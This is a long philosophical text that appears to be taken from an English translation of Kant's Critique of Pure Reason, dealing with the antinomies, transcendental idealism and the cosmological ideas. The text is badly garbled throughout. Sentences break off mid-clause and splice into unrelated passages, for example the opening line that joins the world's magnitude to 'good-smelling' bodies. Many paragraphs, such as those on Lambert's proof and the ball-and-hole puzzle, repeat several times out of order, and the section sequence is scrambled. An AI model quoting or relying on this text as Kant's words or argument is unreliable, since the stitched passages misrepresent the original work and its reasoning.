If we regard the two propositions, that the world is infinite in magnitude and that it is finite in magnitude, as contradictory opposite, namely, that some bodies are not good-smelling, comprehending those bodies also which have no smell at all.

Since, in the previous opposition (per disparata), smell, the contingent condition of the concept of the body, was not removed by the opposed judgment, but remained attached to it, the two judgments were not related as contradictory opposites.

If, therefore, we say that the world is either infinite in extension or is not infinite (non est infinitus), and if the former proposition is false, its contradictory opposite, that the world is not infinite, must be true. And I should thus deny the existence of an infinite world, without affirming in its place a finite world. But if we had said that the world is either infinite or finite (non-infinite), both statements might be false. For in that case we should be regarding the world in itself as determined in its magnitude, and in the opposed judgment we do not merely remove the infinitude, and with it perhaps the entire separate existence of the world, but attach a determination to the world, regarded as a thing actually existing in itself. This assertion may, however, likewise be false; the world may not be given as a thing in itself, nor as being in its magnitude either infinite or finite. I beg permission to entitle this kind of opposition dialectical, and that of contradictories analytical. Thus of two dialectically opposed judgments both may be false; for the one is not a mere contradictory of the other, but says something more than is required for a simple contradiction.

If we regard the two propositions, that the world is infinite in magnitude and that it is finite in magnitude, as contradictory opposites, we are assuming that the world, the complete series of appearances, is a thing in itself that remains even if I suspend the infinite or the finite regress in the series of its appearances. If, however, I reject this assumption, or rather this accompanying transcendental illusion, and deny that the world is a thing in itself, the contradictory opposition of the two assertions is converted into a merely dialectical opposition. Since the world does not exist in itself, independently of the regressive series of my representations, it exists in itself neither as an infinite whole nor as a finite whole. It exists only in the empirical regress? The reason is this. Possible experience is that which can alone give reality to our concepts; in its absence a concept is a mere idea, without truth, that is, without relation to possible experience, it still remains true that they are nothing to me, and therefore are not objects, save in so far as they are contained in the series of the empirical regress? The reason is this. Possible experience is that which can alone give reality to our concepts; in its absence a concept is a mere idea, without truth, that is, without relation to any object. The possible empirical concept is therefore the standard by which we must judge whether the idea is a mere idea and thought-entity, or whether it finds its object in the world. For we can say of anything that it is too large or too small relatively to something else, only if the former is required for the sake of the latter, and has to be adapted to it.

Among the puzzles propounded in the ancient dialectical Schools was the question, whether, if a ball cannot pass through a hole, we should say that the ball is too large or the hole too small. In such a case it is a matter of indifference whether I say that in the empirical advance in space I can meet with stars a hundred times farther removed than the outermost now perceptible to me, or whether I say that they are perhaps to be met with in cosmical space even though no human being has ever perceived or ever will perceive them. For even supposing they were given as things in themselves and as objects given to the pure understanding, than to proceed as we have done in the major, in which we have [similarly] abstracted from all those conditions of intuition under which alone objects can be given. Yet in so doing we have overlooked an important distinction between the concepts. The synthesis of the conditioned with its condition; they are presupposed as given together with it. Further, it is no less natural, in the minor premise, to regard appearances both as things in themselves and as objects given to the pure understanding, than to proceed as we have done in the major, in which we have [similarly] abstracted from all those conditions of intuition under which alone objects can be given. Yet in so doing we have overlooked an important distinction between the concepts. The synthesis of the conditioned with its conditions (and the whole series of the latter) does not in the major premise all the members of the series. The above proposition is thus analytic, and has nothing to fear from a transcendental criticism. It is a logical postulate of reason, that through the understanding we follow up and extend as far as possible that connection of a concept with its conditions which directly results from the concept itself.

Further, if the conditioned as well as its condition are things in themselves, then upon the former being given, the regress to the latter is not only set as a task, but therewith already really given. And since this holds of all members of the series, the complete series of the conditions, and therefore the unconditioned, is given therewith, or rather is presupposed in view of the fact that the conditioned, which is only possible through the complete series, is given. The synthesis of the conditioned with its condition; they are presupposed as given together with it. Further, it is no less natural, in the minor premise, to regard appearances both as things in themselves and as objects given to the pure understanding, than to proceed as we have done in the major, in which we have [similarly] abstracted from all those conditions of intuition under which alone objects can be given. Yet in so doing we have overlooked an important distinction between the concepts. The synthesis of the conditioned with its condition is here a synthesis of the mere understanding, which represents things as they are, without considering whether and how we can obtain knowledge of them. If, however, what we are dealing with are appearances — as mere representations as things in themselves, without relation to possible experience, it still remains true that they are nothing to me, and therefore are not objects, save in so far as they are contained in the series of the empirical regress, and therefore for any possible concept of the understanding applied to mere appearances. The argument thus commits that dialectical fallacy which is entitled sophisma figurae dictionis. This fallacy is not, however, an artificial one; a quite natural illusion of our common reason leads us, when anything is given as conditioned, thus to assume in the major premise, as it were without thought or question, its conditions and their series. This assumption is indeed simply the logical requirement that we should have adequate premises for any given conclusion. Also, there is no reference to a time-order in the connection of the conditioned with its condition is here a synthesis of the mere understanding, which represents things as they are, without considering whether and how we can obtain knowledge of them. If, however, what we are dealing with are appearances — as mere representations appearances cannot be given save in so far as I attain knowledge of them, or rather attain them in themselves, for they are nothing but empirical modes of knowledge — I cannot say, in the same sense of the terms, that if the conditioned is given, all its conditions (as appearances) are likewise given, and therefore cannot in any way infer the absolute totality of the series of its conditions. The appearances are in their apprehension themselves nothing but an empirical synthesis in space and time, and are given only in this synthesis. It does not, therefore, follow, that if the conditioned, in the [field of] appearance, is given, the synthesis which constitutes its empirical condition is given therewith and is presupposed. This synthesis first occurs in the regress, and never exists without it. What we can say is that a regress to the conditions, that is, a continued empirical synthesis, on the side of the conditions, is enjoined or set as a task, and that in this regress there can be no lack of given conditions.

These considerations make it clear that the major premise of the cosmological inference takes the conditioned in the transcendental sense of a pure category, while the minor premise takes it in the empirical sense of a concept of the understanding applied to mere appearances. The argument thus commits that dialectical fallacy which is entitled sophisma figurae dictionis. This fallacy is not, however, an artificial one; a quite natural illusion of our common reason leads us, when anything is given as conditioned, thus to assume in the major premise, as it were without thought or question, its conditions and their series. This assumption is indeed simply the logical requirement that we should have adequate premises for any given conclusion. Also, there is no reference to a time-order in the connection of the conditioned can be grasped completely a priori. For we then start from the unconditioned. This is not done by the antithesis, which for this reason is at a very serious disadvantage. To the question as to the conditions of its synthesis it can give no answer which does not lead to the endless renewal of the same enquiry.

According to the antithesis, every given beginning compels us to advance to one still higher; every part leads to a still smaller part; every event is preceded by another event as its cause; and the conditions of existence in general rest always again upon other conditions, without ever obtaining unconditioned footing and support in any self-subsistent thing, viewed as primordial being.

Thirdly, the thesis has also the advantage of popularity; and this certainly forms no small part of its claim to favour.

The common understanding finds not the least difficulty in the idea of the unconditioned beginning of all synthesis. Being more accustomed to descend to consequences than to ascend to grounds, it does not puzzle over the possibility of the absolutely first; on the contrary, it finds comfort in such concepts, and at the same time a fixed point to which the thread by which it guides its movements can be attached. In the restless ascent from the conditioned to the condition, always with one foot in the air, there can be no satisfaction.

In the determination of the cosmological ideas we find on the side of empiricism, that is, of the antithesis: first, no such practical interest (due to pure principles of reason) as is provided for the thesis by morals and religion. On the contrary, pure empiricism appears to deprive them of all power and influence. If there is no primordial being distinct from the world, if the world is without beginning and therefore without an Author, if our will is not free, and the soul is divisible and perishable like matter, moral ideas and principles lose all validity, and share in the fate of the transcendental ideality of appearances — a proof which ought to convince any who may not be satisfied by the direct proof given in the Transcendental Aesthetic. This proof would consist in the following dilemma. If the world is a whole existing in itself. From this it then follows that appearances in general are nothing outside our representations — which is just what is meant by their transcendental ideality of appearances — a proof which ought to convince any who may not be satisfied by the direct proof given in the Transcendental Aesthetic. This proof would consist in the following dilemma. If the world is a whole existing in itself, it is either finite or infinite. But both alternatives are false (as shown in the proofs of the antithesis and thesis respectively). It is therefore also false that the world (the sum of all appearances) is a whole existing in itself, it is either finite or infinite. But both alternatives are false (as shown in the proofs of the antithesis and thesis respectively). It is therefore also false that the world (the sum of all appearances) is a whole existing in itself. From this it then follows that appearances in general are nothing outside our representations — which is just what is meant by their transcendental idealism, on the contrary, admits the reality of the objects of outer intuition, as intuited in space, and of all changes in time, as represented by inner sense. For since space is a form of that intuition which we entitle outer, and since without objects in space there would be no empirical representation whatsoever, we can and must regard the extended beings in it as real; and the same is true of time. But this space and this time, and with them all appearances, are not in themselves things; they are nothing but representations, and cannot exist outside our mind. Even the inner and sensible intuition of our mind (as object of consciousness) which is represented as being determined by the succession of different states in time, is not the self proper, as it exists in itself — that is, is not the transcendental meaning of this term, treats these modifications of our sensibility as self-subsistent things, that is, treats mere representations as things in themselves.

It would be unjust to ascribe to us that long-decried empirical idealism, which, while it admits the genuine reality of space, denies the existence of the extended beings in it, or at least considers their existence doubtful, and so does not in this regard allow of any properly demonstrable distinction between truth and dreams. As to the appearances of inner sense in time, empirical idealism finds no difficulty in regarding them as real things; indeed it even asserts that this inner experience is the sufficient as well as the only proof of the actual existence of its object (in itself, with all this time-determination).

Our transcendental idealism, on the contrary, admits the reality of the objects of outer intuition, as intuited in space, and of all changes in time, as represented by inner sense. For since space is a form of that intuition which we entitle outer, and since without objects in space there would be no empirical representation whatsoever, we can and must regard the extended beings in it as real; and the same is true of time. But this space and this time, and with them all appearances, are not in themselves things; they are nothing but representations, and cannot exist outside our mind. Even the inner and sensible intuition of our mind (as object of consciousness) which is represented as being determined by the succession of different states in time, is not the self proper, as it exists in itself — that is, is not the transcendental subject — but only an appearance that has been given to the sensibility of this, to us unknown, being.

This inner appearance cannot be admitted to exist in any such manner in and by itself; for it is conditioned by time, and time cannot be a determination of a thing in itself. The empirical truth of appearances in space and time is, however, sufficiently secured; it is adequately distinguished from dreams, if both dreams and genuine appearances cohere truly and completely in one experience, in accordance with empirical laws.

The objects of experience, then, are never given in themselves, but only in experience, and have no existence outside it. That there may be inhabitants in the moon, although no one has ever perceived them, must certainly be admitted. This, however, only means that in the possible advance of experience we may encounter them. For everything is real which stands in connection with a perception in accordance with these ideas, have to seek only the principles or rules of their exposition? Even if we suppose the whole of nature to be spread out before us, and that of all that is presented to our intuition nothing is concealed from our senses and consciousness, yet still through no experience could the object of our ideas be known by us in concreto. For that purpose, in addition to this exhaustive intuition, we should require what is not possible through any empirical knowledge, namely, a completed synthesis and the consciousness of its absolute totality. Accordingly our question does not require to be raised in the explanation of any given appearance, and is therefore not a question which can be regarded as imposed on us by the object itself. The object can never come before us, since it cannot be given through any possible experience. In all possible perceptions we always remain involved in conditions, whether in space or in time, and come upon nothing unconditioned requiring us to determine whether this unconditioned is to be located in an absolute beginning of synthesis, or in an absolute totality of a series that has no beginning.

In its empirical meaning, the term 'whole' is always only comparative. The absolute whole of quantity (the universe), the whole of division, of derivation, of the condition of existence in general, with all questions as to whether it is brought about through finite synthesis or through a synthesis requiring infinite extension, have nothing to do with any possible experience.

We should not, for instance, in any wise be able to explain the appearances of inner sense in time, empirical idealism finds no difficulty in regarding them as real things; indeed it even asserts that this inner experience is the sufficient as well as the only proof of the actual existence of its object (in itself, with all this time-determination).

Our transcendental idealism, on the contrary, admits the reality of the objects of outer intuition, as intuited in space, and of all changes in time, as represented by inner sense. For since space is a form of that intuition which we entitle outer, and since without objects in space there would be no empirical representation, that is, appearance. To call an appearance a real thing prior to our perceiving it, either means that in the advance of experience we must meet with such a perception, or it means nothing at all. For if we were speaking of a thing in itself, we could indeed say that it exists in itself apart from relation to our senses and possible experience. But we are here speaking only of an appearance in space and time, which are not determinations of things in themselves but only of our sensibility. Accordingly, that which is in space and time is an appearance; it is not anything in itself but consists merely of representations, which, if not given in us -that is to say, in perception — are nowhere to be met with.

The faculty of sensible intuition is strictly only a receptivity, a capacity of being affected in a certain manner with representations, the relation of which to one another is a pure intuition of space and of time (mere forms of our sensibility), and which, in so far as they are connected in this manner in space and time, and are determinable according to laws of the unity of experience. Thus we can say that the real things of past time are given in the transcendental object of experience; but they are objects for me and real in past time only in so far as I represent to myself (either by the light of history or by the guiding-clues of causes and effects) that a regressive series of possible perceptions in accordance with empirical laws, in a word, that the course of the world, conducts us to a past time-series as condition of the present time — a series which, however, can be represented as actual not in itself but only in the connection of a possible experience. In all possible perceptions we always remain involved in conditions, whether in space or in time, and come upon nothing unconditioned requiring us to determine whether this unconditioned is to be located in an absolute beginning of synthesis, or in an absolute totality of a series that has no beginning.

In its empirical meaning, the term 'whole' is always only comparative. The absolute whole of quantity (the universe), the whole of division, of derivation, of the condition of existence in general rest always again upon other conditions, without ever obtaining unconditioned footing and support in any self-subsistent thing, viewed as primordial being.

Thirdly, the thesis has also the advantage of popularity; and this certainly forms no small part of its claim to favour.

The common understanding finds not the least difficulty in the idea of the unconditioned. For this member always still allows of a regress to further parts contained in it.

Thirdly, if we suppose that nothing happens in the world save in accordance with the laws of nature, the causality of the cause will always itself be something that happens, making necessary a regress to a still higher cause, and thus a continuation of the series of conditions a parte priori without end. Nature, as working always through efficient causes, is thus too large for any possible empirical concept. If it is finite and limited, we have a right to ask what determines these limits. Empty space is no self-subsistent correlate of things, and cannot be a condition at which we could stop; still less can it be an empirical condition, forming part of a possible experience. (For how can there be any experience of the absolutely void? ) And yet to obtain absolute totality in the empirical synthesis.

The proud pretensions of reason, when it strives to extend its domain beyond all limits of experience, we have represented only in dry formulas that contain merely the ground of their legal claims. As befits a transcendental philosophy, there are two pure rational sciences, one purely speculative, the other with a practical content, namely, pure mathematics and pure ethics. Has it ever been suggested that, because of our necessary ignorance of the conditions, it must remain uncertain what exact relation, in rational or irrational numbers, a diameter bears to a circle? Since no adequate solution in terms of irrational numbers has yet been discovered, it was concluded that at least the impossibility of a solution can be known with certainty, and of this impossibility Lambert has given the required proof. In the universal principles of morals nothing can be uncertain, because the principles are either altogether void and meaningless, or must be derived from the concepts of our reason. In natural science, on the other hand, there is endless conjecture, and certainty is not to be counted upon. For the natural appearances, in regard to which a speculative knowledge is alone possible to us — to the neglect of physical investigation.

Finally, as regards the third factor which has to be considered in a preliminary choice between the two conflicting parties, it is extremely surprising that empiricism should be so universally unpopular. The common understanding, it might be supposed, would eagerly adopt a programme which promises to satisfy it through exclusively empirical knowledge and the rational connections there revealed — in preference to the transcendental dogmatism which compels it to rise to concepts far outstripping the insight and rational faculties of the most practised thinkers. But this is precisely what commends such dogmatism to the common understanding, indeed, all speculative interests pale before the practical; and it imagines that it comprehends and knows what its fears or hopes incite it to assume or to believe.

Thus empiricism is entirely devoid of the popularity of transcendentally idealising reason; and however prejudicial such empiricism may be to the highest practical principles, there is no need to fear that it will ever pass the limits of the Schools, and acquire any considerable influence in the general life or any real favour among the multitude.

Human reason is by nature architectonic. That is to say, it regards all our knowledge as belonging to a possible system, and therefore allows only such principles as do not at any rate make it impossible for any knowledge that we may attain to combine into a system with other knowledge. But the propositions of the antithesis are of such a kind that they render the completion of the edifice of knowledge quite impossible. They maintain that there is always to be found beyond every state of the world a more ancient state, in every part yet other parts similarly divisible, prior to every event still another event which itself again is likewise generated, and that in existence in general everything is conditioned, an unconditioned and first existence being nowhere discernible. Since, therefore, the antithesis thus refuses to admit as first or as a beginning anything that could serve as a foundation for building, a complete edifice of knowledge is, on such assumptions, altogether impossible. Thus the architectonic interest of reason — the demand not for empirical but for pure a priori unity of reason — forms a natural recommendation for the assertions of the thesis.

If men could free themselves from all such interests, and consider the assertions of reason irrespective of their consequences, solely in view of the intrinsic force of their grounds, and were the only way of escape from their perplexities to give adhesion to one or other of the opposing parties, their state would be one of continuous vacillation. To-day it would be their conviction that the human will is free; tomorrow, dwelling in reflection upon the indissoluble chain of nature, they would hold that freedom is nothing but self-deception, that everything is simply nature. If, however, they were summoned to action, this play of the merely speculative reason would, like a dream, at once cease, and they would choose their principles exclusively in accordance with practical interests. Since, however, it is fitting that a reflective and enquiring being should devote a certain amount of time to the examination of his own reason, entirely divesting himself of all partiality and openly submitting his observations to the judgment of others, no one can be blamed for, much less prohibited from, presenting for trial the two opposing parties, leaving them, terrorised by no threats, to defend themselves as best they can, before a jury of like standing with themselves, that is, before a jury of fallible men.
§ 4
THE ABSOLUTE NECESSITY OF A SOLUTION OF THE TRANSCENDENTAL PROBLEMS OF PURE REASON

To profess to solve all problems and to answer all questions would be impudent boasting, and would argue such extravagant self-conceit as at once to forfeit all confidence. Nevertheless there are sciences the very nature of which requires that every question arising within their domain should be completely answerable in terms of what is known, inasmuch as the answer must issue from the same sources from which the question proceeds. In these sciences it is not permissible to plead unavoidable ignorance; the solution can be demanded.

We must be able, in every possible case, in accordance with a rule, to know what is right and what is wrong, since this concerns our obligation, and we have no obligation to that which we cannot know. In the explanation of natural appearances, on the other hand, much must remain uncertain what exact relation, in rational or irrational numbers, a diameter bears to a circle? Since no adequate solution in terms of rational numbers is possible, and no solution in terms of irrational numbers has yet been discovered, it was concluded that at least the impossibility of a solution can be known with certainty, and of this impossibility Lambert has given the required proof. In the universal principles of morals nothing can be uncertain, because the principles are either altogether void and meaningless, or must be derived from the concepts of our reason. In natural science, on the other hand, there is endless conjecture, and certainty is not to be counted upon. For the natural appearances are objects which are given to us independently of our concepts, and the key to them lies not in us and our pure thinking, but outside us; and therefore in many cases, since the key is not to be found, an assured solution is not to be expected. I am not, of course, here referring to those questions of the Transcendental Analytic which concern the deduction of our pure knowledge; we are at present treating only of the certainty of judgments with respect to their objects and not with respect to the source of our concepts themselves.

The obligation of an at least critical solution of the questions which reason thus propounds to itself, we cannot, therefore, escape by complaints of the narrow limits of our reason, and by confessing, under the pretext of a humility based on self-knowledge, that it is beyond the power of our reason to determine whether the world exists from eternity or has a beginning; whether cosmical space is filled with beings to infinitude, or is enclosed within certain limits; whether anything in the world is simple, or everything such as to be infinitely divisible; whether there is generation and production through freedom, or whether everything depends on the chain of events in the natural order; and finally whether there exists any being completely unconditioned and necessary in itself, or whether everything is conditioned in its existence and therefore dependent on external things and itself contingent. All these questions refer to an object which can be found nowhere save in our thoughts, namely, to the absolutely unconditioned totality of the synthesis and of the series thereby represented. In the major premise all the members of the series are given in themselves, but only in this experience, being mere representations, which as perceptions can mark out a real object only in so far as the perception connects with all others according to the rules of the unity of experience. Thus we can say that the real things of past time are given in the transcendental object, but merely in order to have something corresponding to sensibility viewed as a receptivity.

To this transcendental object we can ascribe the whole extent and connection of our possible perceptions. For the appearances, as mere representations, are in themselves real only in perception, which perception is in fact nothing but the reality of an empirical representation, that is, appearance. To call an appearance a real thing prior to our perceiving it, either means that in the advance of experience we must meet with such a perception, or it means nothing at all. For if we were speaking of a thing in itself, we could indeed say that it exists in itself apart from relation to our senses and possible experience. But we are here speaking only of an appearance in space and time, which are not determinations of things in themselves, then upon the former being given, the regress to the latter is not only set as a task, but therewith already really given. And since this holds of all members of the series, the complete series of appearances, is a thing in itself that remains even if I suspend the infinite or the finite regress in the series of its appearances. If, however, I reject this assumption, or rather this accompanying transcendental illusion, and deny that the world is a thing in itself, the contradictory opposition of the two assertions is converted into a merely dialectical opposition. Since the world does not exist in itself, independently of the regressive series of my representations, it exists in itself neither as an infinite whole nor as a finite whole. It exists only in the empirical regress of the series of appearances, and is not to be met with as something in itself. If, then, this series is always conditioned, and therefore can never be given as complete, the world is not an unconditioned whole, and does not exist as such a whole, either of infinite or of finite magnitude.

What we have here said of the first cosmological idea, that is, of the absolute totality of magnitude in the [field of] appearance, applies also to all the others. The series of conditions is only to be met with in the regressive synthesis itself, not in the [field of] appearance, is given, the synthesis which constitutes its empirical condition is given therewith and is presupposed. This synthesis first occurs in the regress, and never exists without it. What we can say is that a regress to the conditions, that is, a continued empirical synthesis, on the side of the conditions, is enjoined or set as a task, and that in this regress there can be no lack of given conditions.

These considerations make it clear that the major premise of the cosmological inference takes the conditioned in the transcendental sense of a pure category, while the minor premise takes it in the empirical sense of a concept of the understanding applied to mere appearances. The argument thus commits that dialectical fallacy which is entitled sophisma figurae dictionis. This fallacy is not, however, an artificial one; a quite natural illusion of our common reason leads us, when anything is given as conditioned, thus to assume in the major premise, as it were without thought or question, its conditions and their series. This assumption is indeed simply the logical requirement that we should have adequate premises for any given conclusion. Also, there is no reference to a time-order in the connection of a possible experience are they given. To say that they exist prior to all my experience is only to assert that they are to be met with if, starting from perception, I advance to that part of experience to which they belong. The cause of the empirical condition is given therewith and is presupposed. This synthesis first occurs in the regress, and never exists without it. What we can say is that a regress to the conditions, that is, a continued empirical synthesis, on the side of the conditions, it must remain uncertain what exact relation, in rational or irrational numbers, a diameter bears to a circle? Since no adequate solution in terms of rational numbers is possible, and no solution in terms of irrational numbers has yet been discovered, it was concluded that at least the impossibility of a solution can be known with certainty, and of this impossibility Lambert has given the required proof. In the universal principles of morals nothing can be uncertain, because the principles are either altogether void and meaningless, or must be derived from the concepts of our reason. In natural science, on the other hand, there is endless conjecture, and certainty is not to be counted upon. For the natural appearances are objects which are given to us independently of our concepts, and the key to them lies not in us and our pure thinking, but outside us; and therefore in many cases, since the key is not to be found, an assured solution is not to be expected. I am not, of course, here referring to those questions of the Transcendental Analytic which concern the deduction of our pure knowledge; we are at present treating only of the certainty of judgments with respect to their objects and not with respect to the source of our concepts themselves.

The obligation of an at least critical solution of the questions which reason thus propounds to itself, we cannot, therefore, escape by complaints of the narrow limits of our reason, and by confessing, under the pretext of a humility based on self-knowledge, that it is beyond the power of our reason to determine whether the world exists from eternity or has a beginning; whether cosmical space is filled with beings to infinitude, or is enclosed within certain limits; whether anything in the world is simple, or everything such as to be infinitely divisible; whether there is generation and production through freedom, or whether everything depends on the chain of events in the natural order; and finally whether there exists any being completely unconditioned and necessary in itself, or whether everything is conditioned in its existence and therefore dependent on external things and itself contingent. All these questions refer to an object which can be found nowhere save in our thoughts, namely, to the absolutely unconditioned totality of the synthesis of appearances, it must either be too large or too small for any concept of the understanding applied to mere appearances. The argument thus commits that dialectical fallacy which is entitled sophisma figurae dictionis. This fallacy is not, however, an artificial one; a quite natural illusion of our common reason leads us, when anything is given as conditioned, thus to assume in the major premise, as it were without thought or question, its conditions and their series. This assumption is indeed simply the logical requirement that we should have adequate premises for any given conclusion. Also, there is no reference to a time-order in the connection of the conditioned with its condition; they are presupposed as given together with it. Further, it is no less natural, in the minor premise, to regard appearances both as things in themselves and as objects given to the pure understanding, than to proceed as we have done in the major, in which we have [similarly] abstracted from all those conditions of intuition under which alone objects can be given. Yet in so doing we have overlooked an important distinction between truth and dreams. As to the appearances of inner sense in time, empirical idealism finds no difficulty in regarding them as real things; indeed it even asserts that this inner experience is the sufficient as well as the only proof of the actual existence of its object (in itself, with all this time-determination).

Our transcendental ideality of appearances — a proof which ought to convince any who may not be satisfied by the direct proof given in the Transcendental Aesthetic. This proof would consist in the following dilemma. If the world is a whole existing in itself, it is either finite or infinite. But both alternatives are false (as shown in the proofs of the antithesis and thesis respectively). It is therefore also false that the world (the sum of all appearances) is a whole existing in itself. From this it then follows that appearances in general are nothing outside our representations — which is just what is meant by their transcendental ideality.

This remark is of some importance. It enables us to see that the proofs given in the fourfold antinomy are not merely baseless deceptions. On the supposition that appearances, and the sensible world which comprehends them all, are things in themselves, then upon the former being given, the regress to the latter is not only set as a task, but therewith already really given. And since this holds of all members of the series, the complete series of appearances, is a thing in itself that remains even if I suspend the infinite or the finite regress in the series of its appearances. If, however, I reject this assumption, or rather this accompanying transcendental illusion, and deny that the world is a thing in itself, the answer to the transcendent cosmological question cannot lie anywhere save in the idea. We are not asking what is the constitution of any object in itself, nor as regards possible experience are we enquiring what can be given in concreto in any experience. Our sole question is as to what lies in the idea, to which the empirical synthesis can do no more than merely approximate; the question must therefore be capable of being solved entirely from the idea.

Since the idea is a mere creature of reason, reason cannot disclaim its responsibility and saddle it upon the unknown object.

It is not so extraordinary as at first seems the case, that a science should be in a position to demand and expect none but assured answers to all the questions within its domain (quaestiones domesticae), although up to the present they have perhaps not been found. In addition to transcendental philosophy, there are two pure rational sciences, one purely speculative, the other with a practical content, namely, pure mathematics and pure ethics. Has it ever been suggested that, because of our necessary ignorance of the conditions, it must remain uncertain what exact relation, in rational or irrational numbers, a diameter bears to a circle? Since no adequate solution in terms of rational numbers is possible, and no solution in terms of irrational numbers has yet been discovered, it was concluded that at least the impossibility of a solution can be known with certainty, and of this impossibility Lambert has given the required proof. In the universal principles of morals nothing can be uncertain, because the principles are either altogether void and meaningless, or must be derived from the concepts of our reason. In natural science, on the other hand, there is endless conjecture, and certainty is not to be counted upon. For the natural appearances are objects which are given to us independently of our concepts, and the key to them lies not in us and our pure thinking, but outside us; and therefore in many cases, since the key is not to be found, an assured solution is not to be expected. I am not, of course, here referring to those questions of the Transcendental Analytic which concern the deduction of our pure knowledge; we are at present treating only of the certainty of judgments with respect to their objects and not with respect to the source of our concepts themselves.

The obligation of an at least critical solution of the questions which reason thus propounds to itself, we cannot, therefore, escape by complaints of the narrow limits of our reason, and by confessing, under the pretext of a humility based on self-knowledge, that it is beyond the power of our reason to determine whether the world exists from eternity or has a beginning; whether cosmical space is filled with beings to infinitude, or is enclosed within certain limits; whether anything in the world is simple, or everything such as to be infinitely divisible; whether there is generation and production through freedom, or whether everything depends on the chain of events in the natural order; and finally whether there exists any being completely unconditioned and necessary in itself, or whether everything is conditioned in its existence and therefore dependent on external things and itself contingent. All these questions refer to an object which can be found nowhere save in our thoughts, namely, to the absolutely unconditioned totality of the synthesis of appearances, it must either be too large or too small for any concept of the understanding, it must be entirely empty and without meaning; for its object, view it as we may, cannot be made to agree with it. This is in fact the case with all cosmical concepts; and this is why reason, so long as it holds to them, is involved in an unavoidable antinomy. For suppose: —

First, that the world has no beginning: it is then too large for our concept, which, consisting as it does in a successive regress, can never reach the whole eternity that has elapsed. Or suppose that the world has a beginning, it will then, in the necessary empirical regress, be too small for the concept of the understanding. For since the beginning still presupposes a time which precedes it, it is still not unconditioned; and the law of the empirical employment of the understanding therefore obliges us to look for a higher temporal condition; and the world [as limited in time] is therefore obviously too small for this law.

This is also true of the twofold answer to the question regarding the magnitude of the world in space. If it is infinite and unlimited, it is too large for any possible empirical concept is therefore the standard by which we must judge whether the idea is a mere idea and thought-entity, or whether it finds its object in the world. For we can say of anything that it is too large or too small relatively to something else, only if the former is required for the sake of the latter, and has to be adapted to it.

Among the puzzles propounded in the ancient dialectical Schools was the question, whether, if a ball cannot pass through a hole, we should say that the ball is too large or the hole too small. In such a case it is a matter of indifference how we choose to express ourselves, for we do not know which exists for the sake of the other. In the case, however, of a man and his coat, we do not say that a man is too tall for his coat, but that the coat is too short for the man.

We have thus been led to what is at least a well-grounded suspicion that the cosmological ideas, and with them all the mutually conflicting pseudo-rational assertions, may perhaps rest on an empty and merely fictitious concept of the manner in which the object of these ideas is given to us; and this suspicion may set us on the right path for laying bare the illusion which has so long led us astray.
§ 6
TRANSCENDENTAL IDEALISM AS THE KEY TO THE SOLUTION OF THE COSMOLOGICAL CONFLICT OF REASON WITH ITSELF

The whole antinomy of pure reason rests upon the dialectical argument: If the conditioned is given, the entire series of all its conditions is likewise given; objects of the senses are given as conditioned; therefore, etc. Through this syllogism, the major premise of which appears so natural and evident, as many cosmological ideas are introduced as there are differences in the conditions (in the synthesis of appearances, it must either be too large or too small relatively to something else, only if the former is required for the sake of the latter, and has to be adapted to it.

Among the puzzles propounded in the ancient dialectical Schools was the question, whether, if a ball cannot pass through a hole, we should say that the ball is too large or the hole too small. In such a case it is a matter of indifference how we choose to express ourselves, for we do not know which exists for the sake of the other. In the case, however, of a man and his coat, we do not say that a man is too tall for his coat, but that the coat is too short for the man.

We have thus been led to what is at least a well-grounded suspicion that the cosmological ideas, and with them all the mutually conflicting pseudo-rational assertions are so many attempts to solve four natural and unavoidable problems of reason. There are just so many, neither more nor fewer, owing to the fact that there are just four series of synthetic presuppositions which impose a priori limitations on the empirical synthesis.

The proud pretensions of reason, when it strives to extend its domain beyond all limits of experience, we have represented only in dry formulas that contain merely the ground of their legal claims. As befits a transcendental philosophy, they have been divested of all empirical features, although only in connection therewith can their full splendour be displayed. But in this empirical application, and in the progressive extension of the employment of reason, philosophy, beginning with the field of our experiences and steadily soaring to these lofty ideas, displays a dignity and worth such that, could it but make good its pretensions, it would leave all other human science far behind. For it promises a secure foundation for our highest expectations in respect of those ultimate ends towards which all the endeavours of reason must ultimately converge.

Whether the world has a beginning [in time] and any limit to its extension in space; whether there is anywhere, and perhaps in my thinking self, an indivisible and indestructible unity, or nothing but what is divisible and transitory; whether I am free in my actions or, like other beings, am led by the hand of nature and of fate; whether finally there is a supreme cause of the world, or whether the things of nature and their order must as the ultimate object terminate thought — an object that even in our speculations can never be transcended: these are questions for the solution of which the mathematician would gladly exchange the whole of his science. For mathematics can yield no satisfaction in regard to those highest ends that most closely concern humanity. And yet the very dignity of mathematics (that pride of human reason) rests upon this, that it guides reason to knowledge of nature in its order and regularity — alike in what is great in it and in what is small — and in the extraordinary unity of its moving forces, thus rising to a degree of insight far beyond what any philosophy based on ordinary experience would lead us to expect; and so gives occasion and encouragement to an employment of reason that is extended beyond all experience, and at the same time supplies it with the most excellent materials for supporting its investigations — so far as the character of these permits — by appropriate intuitions.

Unfortunately for speculation, though fortunately perhaps for the practical interests of humanity, reason, in the midst of its highest expectations, finds itself so compromised by the conflict of opposing arguments, that neither its honour nor its security allows it to withdraw and treat the quarrel with indifference as a mere mock fight; and still less is it in a position to command peace, being itself directly interested in the matters in dispute. Accordingly, nothing remains for reason save to consider whether the origin of this conflict, whereby it is divided against itself, may not have arisen from a mere misunderstanding. In such an enquiry both parties, per chance, may have to sacrifice proud claims; but a lasting and peaceful reign of reason over understanding and the senses would thereby be inaugurated.

For the present we shall defer this thorough enquiry, in order first of all to consider upon which side we should prefer to fight, should we be compelled to make choice between the opposing parties. The raising of this question, how we should proceed if we consulted only our interest and not the logical criterion of truth, will decide nothing in regard to the contested rights of the two parties, but has this advantage, that it enables us to comprehend why the participants in this quarrel, though not influenced by any superior insight into the matter under dispute, have preferred to fight on one side rather than on the other. It will also cast light on a number of incidental points, for instance, the passionate zeal of the one party and the calm assurance of the other; and will explain why the world hails the one with eager approval, and is implacably prejudiced against the other.

Comparison of the principles which form the starting-points of the two parties is what enables us, as we shall find, to determine the standpoint from which alone this preliminary enquiry can be carried out with the required thoroughness. In the assertions of the antithesis we observe a perfect uniformity in manner of thinking and complete unity of maxims, namely a principle of pure empiricism, applied not only in explanation of the appearances within the world, but also in the solution of the transcendental ideas are postulated and employed in the manner prescribed by the thesis, the entire chain of conditions and the derivation of the conditioned can be grasped completely a priori. For we then start from the unconditioned. This is not done by the antithesis, which for this reason is at a very serious disadvantage. To the question as to the conditions of its synthesis it can give no answer which does not lead to the endless renewal of the same enquiry.

